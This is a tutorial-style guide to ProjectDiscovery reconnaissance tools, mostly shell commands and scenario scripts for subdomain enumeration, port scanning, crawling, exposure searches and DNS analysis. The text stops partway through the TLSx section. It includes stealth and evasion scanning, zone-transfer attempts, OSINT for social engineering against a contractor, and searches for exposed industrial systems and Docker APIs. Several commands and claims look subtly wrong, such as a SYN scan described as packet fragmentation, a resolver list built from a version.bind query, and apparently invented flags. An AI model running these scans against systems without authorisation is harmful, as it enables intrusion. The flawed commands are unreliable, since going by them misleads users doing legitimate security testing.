ProjectDiscovery Tools Practical Guide
Table of Contents
- Introduction & Methodology
- Discovery Tools
- Enrichment Tools
- Detection Tools
- Utility Tools
- Advanced Workflows
- Real-World Case Studies
Introduction & Methodology
This guide follows penetration testing best practices incorporating OSSTMM, NIST, and PTES methodologies to provide structured, practical approaches to security testing using ProjectDiscovery tools.
Security Testing Phases
- Discovery Phase: Asset identification and attack surface mapping
- Enrichment Phase: Technology identification and service enumeration
- Detection Phase: Vulnerability identification and exploitation
- Analysis Phase: Risk assessment and reporting
Discovery Tools
1. Subfinder - Passive Subdomain Enumeration
Overview
Subfinder is a passive subdomain discovery tool that leverages multiple data sources to enumerate subdomains without directly interacting with the target.
Installation
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
Basic Usage
# Basic subdomain enumeration
subfinder -d example.com
# Output to file
subfinder -d example.com -o subdomains.txt
# Use specific sources
subfinder -d example.com -sources virustotal,securitytrails
# Verbose output
subfinder -d example.com -v
Advanced Configuration
Configuration File (~/.config/subfinder/provider-config.yaml)
binaryedge:
- "api_key_here"
censys:
- "api_id:api_secret"
certspotter:
- "api_key_here"
chaos:
- "api_key_here"
fofa:
- "email:api_key"
hunter:
- "api_key_here"
securitytrails:
- "api_key_here"
shodan:
- "api_key_here"
virustotal:
- "api_key_here"
zoomeye:
- "username:password"
Real-World Scenarios
Scenario 1: Corporate Asset Discovery
# Target: Large financial institution
# Objective: Map entire digital footprint
# Step 1: Initial enumeration
subfinder -d megabank.com -o megabank_subs.txt -v
# Step 2: Check multiple TLDs
for tld in com net org io; do
subfinder -d megabank.$tld -o megabank_${tld}_subs.txt
done
# Step 3: Recursive enumeration for discovered domains
cat megabank_subs.txt | while read subdomain; do
subfinder -d $subdomain -o ${subdomain}_recursive.txt
done
# Step 4: Combine and deduplicate
cat *_subs.txt | sort -u > megabank_all_subdomains.txt
Scenario 2: Bug Bounty Reconnaissance
# Target: SaaS company with complex infrastructure
# Objective: Find hidden development/staging environments
# Use maximum sources for comprehensive coverage
subfinder -d saascompany.com -all -o saas_subdomains.txt
# Look for common patterns
grep -E "(dev|test|stage|staging|beta|demo|admin|api|internal)" saas_subdomains.txt
# Check for wildcard domains
subfinder -d saascompany.com | grep '\*'
Scenario 3: Red Team Operation
# Target: Government contractor
# Objective: OSINT gathering for social engineering
# Enumerate with rate limiting to avoid detection
subfinder -d contractor.gov -rate-limit 10 -timeout 30 -o contractor_subs.txt
# Focus on high-value targets
grep -E "(mail|vpn|remote|citrix|exchange|owa|admin|portal)" contractor_subs.txt
Advanced Techniques
Custom Wordlist Integration
# Create custom wordlist based on target
echo -e "api\ndev\nstaging\ntest\nbeta\nadmin\nportal\nvpn\nmail\nftp" > custom_subs.txt
# Use with subfinder
subfinder -d target.com -w custom_subs.txt
Monitoring and Continuous Discovery
#!/bin/bash
# Script: continuous_subfinder.sh
DOMAIN=$1
SLEEP_TIME=3600 # 1 hour
while true; do
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
subfinder -d $DOMAIN -o "${DOMAIN}_${TIMESTAMP}.txt"
# Compare with previous results
if [ -f "previous_subs.txt" ]; then
comm -13 previous_subs.txt "${DOMAIN}_${TIMESTAMP}.txt" > new_subs.txt
if [ -s new_subs.txt ]; then
echo "New subdomains found:"
cat new_subs.txt
fi
fi
cp "${DOMAIN}_${TIMESTAMP}.txt" previous_subs.txt
sleep $SLEEP_TIME
done
Integration with Other Tools
# Pipeline: Subfinder → Httpx → Nuclei
subfinder -d target.com | httpx -silent | nuclei -t vulnerabilities/
2. Naabu - High-Performance Port Scanner
Overview
Naabu is a port scanning tool designed for speed and reliability, capable of scanning thousands of hosts efficiently.
Installation
go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest
Basic Usage
# Scan top 1000 ports
naabu -host example.com
# Scan specific ports
naabu -host example.com -p 80,443,8080,8443
# Scan port range
naabu -host example.com -p 1-1000
# Scan multiple hosts
naabu -list hosts.txt -p 1-65535
Advanced Configuration
Configuration File (~/.config/naabu/config.yaml)
# Rate limiting
rate: 1000
# Threads
c: 25
# Timeout
timeout: 1000
# Interface
interface: eth0
# Custom ports
ports:
- "80,443,8080,8443"
- "22,23,25,53,110,143,993,995"
- "1433,3306,5432,6379,27017"
Real-World Scenarios
Scenario 1: Network Infrastructure Assessment
# Target: Corporate network range
# Objective: Identify all listening services
# Step 1: Discover live hosts first
nmap -sn 192.168.1.0/24 | grep "Nmap scan report" | awk '{print $5}' > live_hosts.txt
# Step 2: Port scan with service detection
naabu -list live_hosts.txt -p 1-65535 -rate 1000 -o all_ports.txt
# Step 3: Focus on critical services
naabu -list live_hosts.txt -p 22,23,25,53,80,135,139,443,445,993,995,3389 -v
# Step 4: Identify unusual services
naabu -list live_hosts.txt -exclude-ports 80,443,22,53 -top-ports 1000
Scenario 2: Cloud Asset Discovery
# Target: AWS infrastructure
# Objective: Map exposed services across regions
# Scan common cloud ports
naabu -list aws_ips.txt -p 22,80,443,8080,8443,3000,5000,8000,9000 -rate 500
# Check for container orchestration
naabu -list aws_ips.txt -p 2375,2376,6443,8001,8080,10250 -v
# Database services
naabu -list aws_ips.txt -p 1433,3306,5432,6379,27017,9200,9300
Scenario 3: Stealth Reconnaissance
# Target: High-security environment
# Objective: Avoid detection while gathering intelligence
# Use slow scan with randomization
naabu -host target.com -rate 50 -timeout 5000 -p 1-1000
# Scan through proxy
naabu -host target.com -proxy http://proxy:8080 -p 80,443
# Fragment packets to evade detection
naabu -host target.com -scan-type s -rate 100 -p 1-65535
Advanced Techniques
Custom Port Lists
# Web services
echo "80,443,8080,8443,8000,8888,3000,5000,9000" > web_ports.txt
# Database services
echo "1433,3306,5432,6379,27017,9200,9300,5984,7000,7001" > db_ports.txt
# Use custom lists
naabu -list targets.txt -ports-file web_ports.txt
Integration with Service Detection
# Naabu + Nmap service detection
naabu -host target.com -silent | nmap -sV -sC -iL - -oA target_services
# Naabu + Nuclei for vulnerability scanning
naabu -host target.com -silent | httpx -silent | nuclei -t exposures/
Performance Optimization
# High-performance scanning
naabu -list targets.txt -rate 5000 -c 50 -retries 1 -warm-up-time 2
# Network-optimized scanning
naabu -list targets.txt -interface eth0 -source-ip 192.168.1.100 -rate 2000
3. Katana - Web Crawling Framework
Overview
Katana is a fast web crawling framework designed for comprehensive web asset discovery and parsing.
Installation
go install -v github.com/projectdiscovery/katana/cmd/katana@latest
Basic Usage
# Basic crawling
katana -u https://example.com
# Crawl with depth control
katana -u https://example.com -depth 3
# Output to file
katana -u https://example.com -o crawled_urls.txt
# JSON output
katana -u https://example.com -json -o results.json
Advanced Configuration
Configuration File (~/.config/katana/config.yaml)
# Crawling depth
depth: 3
# Rate limiting
rate-limit: 100
# Timeout settings
timeout: 10
# Headers
headers:
- "User-Agent: Mozilla/5.0 (compatible; KatanaBot/1.0)"
# Form filling
form-config: forms.yaml
Real-World Scenarios
Scenario 1: E-commerce Security Assessment
# Target: Online store
# Objective: Map all pages and identify sensitive endpoints
# Step 1: Deep crawl with authentication
katana -u https://store.com -depth 5 -headless \
-headers "Cookie: session=abc123" \
-field-scope "xpath://input[@type='password']"
# Step 2: Focus on API endpoints
katana -u https://store.com -field-scope "regex:.*api.*" -json
# Step 3: Extract forms and parameters
katana -u https://store.com -form-extraction -output-file forms.txt
# Step 4: Identify admin panels
katana -u https://store.com | grep -E "(admin|panel|dashboard|manage)"
Scenario 2: Single Page Application (SPA) Testing
# Target: React/Angular application
# Objective: Discover all routes and endpoints
# JavaScript-heavy application crawling
katana -u https://spa-app.com -headless -chrome-sandbox=false \
-depth 4 -field-scope "href,src,action,formaction"
# Extract API calls from JavaScript
katana -u https://spa-app.com -js-crawl -js-timeout 30 \
-field-scope "regex:.*\\.js$" -output-file js_endpoints.txt
# Monitor XHR requests
katana -u https://spa-app.com -xhr-extraction -json
Scenario 3: Content Discovery for Bug Bounty
# Target: Corporate website
# Objective: Find hidden files and directories
# Comprehensive crawling with multiple strategies
katana -u https://company.com -depth 3 -passive \
-field-scope "href,src,action,formaction,data-url"
# Look for sensitive files
katana -u https://company.com | grep -E "\\.(env|config|backup|log|sql)$"
# Extract social media and external links
katana -u https://company.com -field-scope "href" | grep -E "(facebook|twitter|linkedin|github)"
Advanced Techniques
Custom Field Extraction
# Extract all data attributes
katana -u https://target.com -field-scope "xpath://@data-*"
# Extract API endpoints from JavaScript
katana -u https://target.com -js-crawl | grep -oP "api/v\d+/[^\"']*"
# Extract email addresses
katana -u https://target.com | grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}"
Form Analysis
# Extract all forms with their methods and actions
katana -u https://target.com -form-extraction -json | jq '.forms[]'
# Identify file upload endpoints
katana -u https://target.com -form-extraction | grep -i "file\|upload"
Integration Workflows
# Katana → FFUF for directory bruteforcing
katana -u https://target.com | cut -d'/' -f1-3 | sort -u | while read url; do
ffuf -w wordlist.txt -u $url/FUZZ
done
# Katana → Nuclei for vulnerability scanning
katana -u https://target.com | nuclei -t exposures/ -t vulnerabilities/
4. Chaos - Internet-Wide Asset Discovery
Overview
Chaos provides access to internet-wide asset data, offering insights into global infrastructure and enabling comprehensive asset discovery.
Installation
go install -v github.com/projectdiscovery/chaos-client/cmd/chaos@latest
Basic Usage
# Get subdomains for a domain
chaos -d example.com
# Output to file
chaos -d example.com -o chaos_results.txt
# Silent mode
chaos -d example.com -silent
# Count results
chaos -d example.com -count
Configuration
# Configure API key
chaos -update
# Set API key as environment variable
export CHAOS_API_KEY="your_api_key_here"
Real-World Scenarios
Scenario 1: Threat Intelligence Gathering
# Target: Fortune 500 company
# Objective: Map global infrastructure
# Get all known subdomains
chaos -d megacorp.com -o megacorp_chaos.txt
# Cross-reference with current DNS
dig +short $(cat megacorp_chaos.txt) | sort -u > megacorp_ips.txt
# Identify cloud providers
cat megacorp_ips.txt | while read ip; do
whois $ip | grep -E "(AWS|Amazon|Microsoft|Google|Azure)"
done
Scenario 2: Acquisition Intelligence
# Target: Recently acquired company
# Objective: Identify legacy infrastructure
# Compare pre/post acquisition assets
chaos -d oldcompany.com -o pre_acquisition.txt
chaos -d newparent.com -o post_acquisition.txt
# Find potential overlooked assets
comm -23 pre_acquisition.txt post_acquisition.txt > orphaned_assets.txt
Scenario 3: Supply Chain Analysis
# Target: Software vendor
# Objective: Map vendor relationships
# Get vendor's infrastructure
chaos -d vendor.com -o vendor_assets.txt
# Look for customer-specific subdomains
grep -E "(client|customer|[0-9]{4,})" vendor_assets.txt
# Identify hosting patterns
cat vendor_assets.txt | cut -d'.' -f2- | sort | uniq -c | sort -nr
Advanced Integration
Chaos + Historical Analysis
#!/bin/bash
# Track infrastructure changes over time
DOMAIN=$1
DATE=$(date +%Y%m%d)
chaos -d $DOMAIN -o "chaos_${DOMAIN}_${DATE}.txt"
# Compare with previous month
if [ -f "chaos_${DOMAIN}_previous.txt" ]; then
echo "New assets discovered:"
comm -13 "chaos_${DOMAIN}_previous.txt" "chaos_${DOMAIN}_${DATE}.txt"
echo "Assets removed:"
comm -23 "chaos_${DOMAIN}_previous.txt" "chaos_${DOMAIN}_${DATE}.txt"
fi
5. Uncover - Search Engine for Exposed Assets
Overview
Uncover searches multiple search engines (Shodan, Censys, Fofa, etc.) to find exposed hosts and services.
Installation
go install -v github.com/projectdiscovery/uncover/cmd/uncover@latest
Basic Usage
# Search across all engines
uncover -q "apache"
# Search specific engine
uncover -q "nginx" -e shodan
# Search by IP range
uncover -q "ip:192.168.1.0/24"
# Limit results
uncover -q "port:443" -limit 100
Configuration
# ~/.config/uncover/provider-config.yaml
shodan: ["api_key_here"]
censys: ["api_id:api_secret"]
fofa: ["email:api_key"]
hunter: ["api_key_here"]
zoomeye: ["username:password"]
Real-World Scenarios
Scenario 1: IoT Security Assessment
# Target: Organization's IoT devices
# Objective: Identify exposed industrial control systems
# Search for common IoT protocols
uncover -q "port:502,503,102" -e shodan,censys | grep organization.com
# Look for webcams and IP cameras
uncover -q "webcam" -q "organization.com" -limit 50
# Industrial systems
uncover -q "scada OR ics OR plc" -q "organization.com"
Scenario 2: Cloud Misconfigurations
# Target: Company's cloud infrastructure
# Objective: Find exposed cloud services
# Exposed databases
uncover -q "mongodb" -q "company.com" -e shodan
uncover -q "elasticsearch" -q "company.com" -e censys
# Open S3 buckets
uncover -q "http.title:Index of /" -q "company.com"
# Exposed Docker APIs
uncover -q "port:2375,2376" -q "company.com"
Scenario 3: Attack Surface Monitoring
# Target: Critical infrastructure
# Objective: Continuous monitoring for new exposures
#!/bin/bash
# Script: monitor_exposure.sh
COMPANY=$1
# Monitor critical services
for service in "rdp" "vnc" "ssh" "ftp" "telnet"; do
uncover -q "$service" -q "$COMPANY" -json > "${service}_exposure_$(date +%Y%m%d).json"
done
# Check for new exposures
uncover -q "$COMPANY" -limit 1000 | comm -13 previous_exposure.txt - > new_exposures.txt
Advanced Queries
Complex Search Patterns
# Multiple conditions
uncover -q "port:80,443 AND title:login AND org:target"
# Technology stack identification
uncover -q "http.server:nginx AND http.title:admin AND target.com"
# Vulnerability-specific searches
uncover -q "http.title:phpMyAdmin AND target.com"
uncover -q "port:23 AND banner:password AND target.com"
6. Cloudlist - Multi-Cloud Asset Enumeration
Overview
Cloudlist enumerates assets across multiple cloud providers (AWS, GCP, Azure, DigitalOcean) to provide comprehensive cloud visibility.
Installation
go install -v github.com/projectdiscovery/cloudlist/cmd/cloudlist@latest
Configuration
# ~/.config/cloudlist/config.yaml
aws:
- id: AKIA...
secret: xxxx
region: us-east-1
gcp:
- service_account_path: /path/to/service-account.json
azure:
- tenant_id: xxx
client_id: xxx
client_secret: xxx
subscription_id: xxx
digitalocean:
- token: xxx
Basic Usage
# List all instances across providers
cloudlist
# Specific provider
cloudlist -provider aws
# Specific resource type
cloudlist -provider aws -resource ec2
# Output formats
cloudlist -json
cloudlist -csv
Real-World Scenarios
Scenario 1: Multi-Cloud Security Assessment
# Target: Enterprise with multi-cloud setup
# Objective: Comprehensive cloud asset inventory
# Generate complete inventory
cloudlist -json > cloud_inventory.json
# Extract public IPs
jq -r '.[] | select(.public_ipv4 != null) | .public_ipv4' cloud_inventory.json > public_ips.txt
# Identify high-risk instances
jq -r '.[] | select(.public_ipv4 != null and .private_ipv4 != null) | [.provider, .resource, .public_ipv4, .tags] | @csv' cloud_inventory.json
Scenario 2: Shadow IT Discovery
# Target: Large organization
# Objective: Find unauthorized cloud resources
# Get all AWS resources across regions
for region in us-east-1 us-west-2 eu-west-1; do
cloudlist -provider aws -region $region -json > aws_${region}.json
done
# Identify resources without proper tags
jq -r '.[] | select(.tags.Department == null or .tags.Owner == null)' aws_*.json
# Find old/abandoned resources
jq -r '.[] | select(.created_time < "2023-01-01")' aws_*.json
Scenario 3: Compliance Monitoring
# Target: Regulated industry
# Objective: Ensure compliance with data residency requirements
# Check for resources in non-compliant regions
cloudlist -provider aws -json | jq -r '.[] | select(.region | test("ap-|sa-")) | [.resource, .region, .public_ipv4] | @csv'
# Identify unencrypted storage
cloudlist -provider aws -resource s3 -json | jq -r '.[] | select(.encryption == false)'
Advanced Integration
Automated Security Scanning
#!/bin/bash
# Script: cloud_security_scan.sh
# Get all public IPs
cloudlist -json | jq -r '.[] | select(.public_ipv4 != null) | .public_ipv4' > cloud_ips.txt
# Port scan cloud assets
naabu -list cloud_ips.txt -top-ports 1000 -o cloud_ports.txt
# Web service enumeration
cat cloud_ips.txt | httpx -silent | nuclei -t exposures/
7. ASNmap - Autonomous System Mapping
Overview
ASNmap maps organization network ranges using ASN information, providing comprehensive network infrastructure visibility.
Installation
go install -v github.com/projectdiscovery/asnmap/cmd/asnmap@latest
Basic Usage
# Get ASN info for domain
asnmap -d example.com
# Get ASN info for IP
asnmap -ip 8.8.8.8
# Get all IPs for ASN
asnmap -asn AS15169
# Output CIDR ranges
asnmap -org "Google LLC" -cidr
Real-World Scenarios
Scenario 1: Corporate Network Mapping
# Target: Large corporation
# Objective: Map entire network infrastructure
# Get organization's ASNs
asnmap -org "Mega Corporation" -json > megacorp_asns.json
# Extract all CIDR ranges
jq -r '.[] | .cidr[]?' megacorp_asns.json > megacorp_cidrs.txt
# Get all individual IPs
asnmap -org "Mega Corporation" -silent > megacorp_ips.txt
# Scan the network ranges
cat megacorp_cidrs.txt | while read cidr; do
naabu -cidr $cidr -top-ports 100 -o scan_${cidr//\//_}.txt
done
Scenario 2: Supply Chain Analysis
# Target: Software vendor and customers
# Objective: Map vendor-customer relationships
# Get vendor's network ranges
asnmap -org "Software Vendor Inc" -cidr > vendor_cidrs.txt
# Check for customer connections
cat customer_list.txt | while read customer; do
echo "=== $customer ==="
asnmap -org "$customer" -cidr
done
Scenario 3: Threat Intelligence
# Target: Suspicious infrastructure
# Objective: Map malicious infrastructure
# Get ASN info for suspicious IPs
cat suspicious_ips.txt | while read ip; do
asnmap -ip $ip -json
done > suspicious_asns.json
# Identify hosting providers
jq -r '.[] | [.ip, .org, .country] | @csv' suspicious_asns.json
# Find related infrastructure
jq -r '.[] | .asn' suspicious_asns.json | sort -u | while read asn; do
asnmap -asn $asn -silent
done
8. Alterx - Subdomain Wordlist Generator
Overview
Alterx generates custom subdomain wordlists using a domain-specific language (DSL) for targeted subdomain discovery.
Installation
go install -v github.com/projectdiscovery/alterx/cmd/alterx@latest
Basic Usage
# Generate variations
echo "api" | alterx
# Use patterns
echo "{{word}}-{{number}}" | alterx -p
# Multiple inputs
echo -e "api\ndev\ntest" | alterx
# Output to file
echo "admin" | alterx -o admin_variations.txt
DSL Patterns
# Number patterns
echo "{{word}}{{number:1-100}}" | alterx
# Date patterns
echo "{{word}}-{{year}}" | alterx
# Custom patterns
echo "{{word}}.{{env}}.{{region}}" | alterx -env dev,test,prod -region us,eu
Real-World Scenarios
Scenario 1: API Endpoint Discovery
# Target: SaaS application
# Objective: Discover API versions and endpoints
# Generate API patterns
echo -e "api\napi-v1\napi-v2\nrest\ngraphql" | alterx -p "{{word}}.{{env}}" -env "dev,staging,prod"
# Versioning patterns
echo "api" | alterx -p "{{word}}{{version}}" -version "v1,v2,v3,1,2,3"
# Regional patterns
echo "api" | alterx -p "{{region}}-{{word}}" -region "us-east,us-west,eu-west,ap-south"
Scenario 2: Development Environment Discovery
# Target: Development team
# Objective: Find dev/test environments
# Environment-based patterns
echo -e "app\nportal\ndashboard" | alterx -p "{{env}}-{{word}}" -env "dev,test,staging,qa,demo,beta"
# Developer-specific patterns
echo "dev" | alterx -p "{{word}}-{{name}}" -name "john,jane,mike,sarah"
# Feature branch patterns
echo "feature" | alterx -p "{{word}}-{{feature}}" -feature "auth,payment,api,ui"
Scenario 3: Infrastructure Pattern Analysis
# Target: Large enterprise
# Objective: Understand naming conventions
# Geographic patterns
echo -e "mail\nvpn\nportal" | alterx -p "{{location}}-{{word}}" -location "nyc,lon,tok,syd"
# Departmental patterns
echo "intranet" | alterx -p "{{dept}}-{{word}}" -dept "hr,finance,it,legal,marketing"
# Infrastructure patterns
echo "server" | alterx -p "{{word}}{{number:01-99}}" > server_patterns.txt
Advanced Pattern Generation
Custom Dictionary Integration
# Use organization-specific terms
echo -e "internal\nconfidential\nrestricted" | alterx -p "{{word}}-{{classification}}" -classification "public,private,secret"
# Technology stack patterns
echo "app" | alterx -p "{{word}}-{{tech}}" -tech "java,python,nodejs,php,dotnet"
Integration with Discovery Tools
# Generate patterns and test with subfinder
echo "api" | alterx -p "{{word}}-{{env}}" | while read pattern; do
subfinder -d target.com -w <(echo $pattern)
done
# Combine with brute force tools
echo "admin" | alterx > admin_patterns.txt
gobuster dns -d target.com -w admin_patterns.txt
9. Shuffledns - DNS Bruteforce with Wildcard Handling
Overview
Shuffledns is a wrapper around massDNS for bruteforcing subdomains with advanced wildcard detection and handling.
Installation
go install -v github.com/projectdiscovery/shuffledns/cmd/shuffledns@latest
Prerequisites
# Install massDNS
git clone https://github.com/blechschmidt/massdns.git
cd massdns
make
sudo cp bin/massdns /usr/local/bin/
Basic Usage
# Basic bruteforce
shuffledns -d example.com -w wordlist.txt
# Use custom resolvers
shuffledns -d example.com -w wordlist.txt -r resolvers.txt
# Output to file
shuffledns -d example.com -w wordlist.txt -o discovered.txt
# Wildcard filtering
shuffledns -d example.com -w wordlist.txt -wt 10
Real-World Scenarios
Scenario 1: Comprehensive Subdomain Discovery
# Target: E-commerce platform
# Objective: Find all subdomains including wildcards
# Create comprehensive wordlist
cat /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt \
/usr/share/wordlists/SecLists/Discovery/DNS/fierce-hostlist.txt > comprehensive.txt
# Run with wildcard detection
shuffledns -d ecommerce.com -w comprehensive.txt -wt 5 -t 100 -o ecommerce_subs.txt
# Validate results
cat ecommerce_subs.txt | httpx -silent -o valid_subdomains.txt
Scenario 2: CDN and Load Balancer Discovery
# Target: Global service provider
# Objective: Map CDN infrastructure
# Geographic patterns
echo -e "cdn\nstatic\nassets\nmedia\nimages" > cdn_words.txt
shuffledns -d globalservice.com -w cdn_words.txt -wt 3
# Numeric patterns for load balancers
seq 1 100 | sed 's/^/lb/' > lb_numbers.txt
shuffledns -d globalservice.com -w lb_numbers.txt
Scenario 3: Legacy System Discovery
# Target: Acquired company
# Objective: Find forgotten legacy systems
# Old naming conventions
echo -e "old\nlegacy\narchive\nbackup\ntest\ndev\nstaging" > legacy_words.txt
# Year-based patterns
for year in {2010..2020}; do echo "system$year"; done > year_patterns.txt
# Technology-specific patterns
echo -e "exchange\nsharepoint\ncitrix\nvmware\njenkins" > tech_words.txt
# Combine and test
cat legacy_words.txt year_patterns.txt tech_words.txt > legacy_combined.txt
shuffledns -d acquired-company.com -w legacy_combined.txt -wt 5
Advanced Configuration
Custom Resolver Lists
# Create high-quality resolver list
echo -e "8.8.8.8\n8.8.4.4\n1.1.1.1\n1.0.0.1" > resolvers.txt
# Add more resolvers for redundancy
dig @8.8.8.8 +short txt version.bind | head -20 >> resolvers.txt
Performance Optimization
# High-performance configuration
shuffledns -d target.com -w huge_wordlist.txt -t 500 -wt 10 -retries 2 -timeout 3
Integration Workflows
# Shuffledns → Httpx → Nuclei pipeline
shuffledns -d target.com -w wordlist.txt -silent | \
httpx -silent -follow-redirects | \
nuclei -t technologies/ -silent
Enrichment Tools
10. Httpx - HTTP Toolkit for Reconnaissance
Overview
Httpx is a fast HTTP toolkit for probing services, identifying web servers, and gathering HTTP metadata.
Installation
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
Basic Usage
# Probe URLs
echo "https://example.com" | httpx
# Probe from file
httpx -list urls.txt
# Show response status
httpx -list urls.txt -status-code
# Extract titles
httpx -list urls.txt -title
Advanced Features
Technology Detection
# Detect web technologies
httpx -list urls.txt -tech-detect
# Server headers
httpx -list urls.txt -server
# Response headers
httpx -list urls.txt -response-headers
Content Analysis
# Extract page titles and content length
httpx -list urls.txt -title -content-length
# Response time analysis
httpx -list urls.txt -response-time
# Status code filtering
httpx -list urls.txt -mc 200,301,302
Real-World Scenarios
Scenario 1: Large-Scale Web Asset Enumeration
# Target: Fortune 500 company
# Objective: Map all web services and technologies
# Step 1: Get all subdomains
subfinder -d megacorp.com -silent > megacorp_subs.txt
# Step 2: Probe all HTTP services
cat megacorp_subs.txt | httpx -silent -threads 50 -timeout 10 > megacorp_http.txt
# Step 3: Technology stack analysis
cat megacorp_http.txt | httpx -tech-detect -json > megacorp_tech.json
# Step 4: Extract critical information
jq -r '.[] | [.url, .tech, .status_code, .title] | @csv' megacorp_tech.json > technology_matrix.csv
# Step 5: Identify high-value targets
grep -E "(admin|login|portal|dashboard)" megacorp_http.txt > high_value_targets.txt
Scenario 2: API Discovery and Analysis
# Target: API-heavy application
# Objective: Discover and analyze API endpoints
# Probe for API endpoints
echo -e "api\napi-v1\napi-v2\nrest\ngraphql\nv1\nv2\nv3" | \
while read api; do echo "https://target.com/$api"; done | \
httpx -silent -mc 200,401,403
# Check for API documentation
echo -e "docs\napi-docs\nswagger\nopenapi\ngraphiql" | \
while read doc; do echo "https://target.com/$doc"; done | \
httpx -title -mc 200
# Analyze API responses
cat api_endpoints.txt | httpx -json -content-type > api_analysis.json
jq -r '.[] | select(.content_type | contains("json")) | .url' api_analysis.json
Scenario 3: Security Header Analysis
# Target: Security-conscious organization
# Objective: Assess security header implementation
# Check security headers
cat domains.txt | httpx -response-headers -json | \
jq -r '.[] | [.url, .headers["strict-transport-security"], .headers["content-security-policy"], .headers["x-frame-options"]] | @csv'
# Identify missing security headers
cat domains.txt | httpx -json | \
jq -r '.[] | select(.headers["strict-transport-security"] == null or .headers["content-security-policy"] == null) | .url'
# Check for information disclosure
cat domains.txt | httpx -server -tech-detect | grep -E "(nginx|apache|iis).*[0-9]"
Advanced Techniques
Custom HTTP Methods
# Test different HTTP methods
for method in GET POST PUT DELETE PATCH OPTIONS; do
echo "https://target.com/api/users" | httpx -method $method -silent
done
# Method enumeration
cat endpoints.txt | httpx -method OPTIONS -response-headers | grep -i allow
Response Analysis
# Content-based filtering
httpx -list urls.txt -match-string "admin"
httpx -list urls.txt -filter-string "404"
# Response size analysis
httpx -list urls.txt -content-length | awk '$2 > 10000'
# Custom header injection
httpx -list urls.txt -header "X-Forwarded-For: 127.0.0.1"
Pipeline Integration
# Complete reconnaissance pipeline
subfinder -d target.com -silent | \
httpx -silent -tech-detect -title -status-code | \
tee web_assets.txt | \
nuclei -t exposures/ -silent
11. DNSx - DNS Toolkit
Overview
DNSx is a fast DNS toolkit for multiple DNS operations including resolution, wildcard testing, and DNS record enumeration.
Installation
go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest
Basic Usage
# Resolve domains
echo "example.com" | dnsx
# Multiple domains
cat domains.txt | dnsx
# Specific record types
echo "example.com" | dnsx -a -aaaa -cname -mx
# Wildcard testing
echo "example.com" | dnsx -wildcard
Advanced Features
DNS Record Enumeration
# All record types
echo "example.com" | dnsx -a -aaaa -cname -mx -ns -txt -srv
# Reverse DNS lookup
echo "8.8.8.8" | dnsx -ptr
# DNS over HTTPs
echo "example.com" | dnsx -doh
Mass Operations
# Resolve large lists
cat million_domains.txt | dnsx -threads 100
# Response filtering
cat domains.txt | dnsx -resp-only
# JSON output
cat domains.txt | dnsx -json
Real-World Scenarios
Scenario 1: DNS Infrastructure Analysis
# Target: Enterprise network
# Objective: Map DNS infrastructure and identify misconfigurations
# Step 1: Enumerate all DNS records
cat enterprise_domains.txt | dnsx -a -aaaa -cname -mx -ns -txt -json > dns_records.json
# Step 2: Identify DNS servers
jq -r '.[] | select(.ns != null) | .ns[]?' dns_records.json | sort -u > dns_servers.txt
# Step 3: Check for DNS misconfigurations
# Zone transfer attempts
cat dns_servers.txt | while read ns; do
dig @$ns enterprise.com axfr
done
# SPF record analysis
jq -r '.[] | select(.txt != null) | .txt[]? | select(. | contains("spf"))' dns_records.json
# Step 4: Identify subdomain takeover opportunities
jq -r '.[] | select(.cname != null) | [.host, .cname] | @csv' dns_records.json > cname_targets.csv
Scenario 2: Cloud Migration Assessment
# Target: Company migrating to cloud
# Objective: Track DNS changes and identify legacy infrastructure
# Pre-migration snapshot
cat company_domains.txt | dnsx -a -aaaa -json > pre_migration_dns.json
# Post-migration comparison
cat company_domains.txt | dnsx -a -aaaa -json > post_migration_dns.json
# Identify changes
jq -r '.[] | [.host, .a[]] | @csv' pre_migration_dns.json | sort > pre_ips.txt
jq -r '.[] | [.host, .a[]] | @csv' post_migration_dns.json | sort > post_ips.txt
comm -13 post_ips.txt pre_ips.txt > legacy_ips.txt
# Analyze cloud provider distribution
jq -r '.[] | .a[]?' post_migration_dns.json | while read ip; do
whois $ip | grep -E "(AWS|Amazon|Microsoft|Google|Azure)"
done | sort | uniq -c
Scenario 3: Threat Intelligence and Monitoring
# Target: Critical infrastructure
# Objective: Monitor for suspicious DNS changes
# Daily DNS monitoring
DATE=$(date +%Y%m%d)
cat critical_domains.txt | dnsx -a -json > "dns_snapshot_$DATE.json"
# Compare with previous day
if [ -f "dns_snapshot_$(date -d yesterday +%Y%m%d).json" ]; then
# Extract A records
jq -r '.[] | [.host, .a[]] | @csv' "dns_snapshot_$DATE.json" | sort > today_dns.txt
jq -r '.[] | [.host, .a[]] | @csv' "dns_snapshot_$(date -d yesterday +%Y%m%d).json" | sort > yesterday_dns.txt
# Find changes
echo "New DNS records:"
comm -13 yesterday_dns.txt today_dns.txt
echo "Removed DNS records:"
comm -23 yesterday_dns.txt today_dns.txt
fi
# Check for suspicious TXT records
cat critical_domains.txt | dnsx -txt | grep -E "(bitcoin|crypto|ransom)"
Advanced Techniques
Wildcard Detection and Handling
# Test for wildcard DNS
echo "example.com" | dnsx -wildcard
# Generate random subdomains to test wildcards
for i in {1..10}; do
echo "$(openssl rand -hex 8).example.com"
done | dnsx -wildcard
Custom Resolver Configuration
# Use specific resolvers
echo "example.com" | dnsx -resolver 8.8.8.8,1.1.1.1
# Test resolver performance
for resolver in 8.8.8.8 1.1.1.1 9.9.9.9; do
time echo "example.com" | dnsx -resolver $resolver
done
Integration with Other Tools
# DNSx + Naabu for comprehensive enumeration
cat domains.txt | dnsx -a -resp-only | naabu -top-ports 1000
# DNSx + Httpx pipeline
cat domains.txt | dnsx -a -resp-only | httpx -silent
12. TLSx - TLS/SSL Analysis Tool
Overview
TLSx specializes in TLS/SSL data collection, providing insights into certificates, cipher suites, and SSL/TLS configurations.
Installation
go install -v github.com/projectdiscovery/tlsx/cmd/tlsx@latest
Basic Usage
# Basic TLS probe
echo "https://example.com" | tlsx
# Certificate information
echo "https://example.com" | tlsx -cert
# Cipher suite enumeration
echo "https://example.com" | tlsx -cipher
# JSON output
echo "https://example.com" | tlsx -json
Advanced Features
Certificate Analysis
# Certificate details
echo "https://example.com" | tlsx -cert -cert-info
# Certificate chain
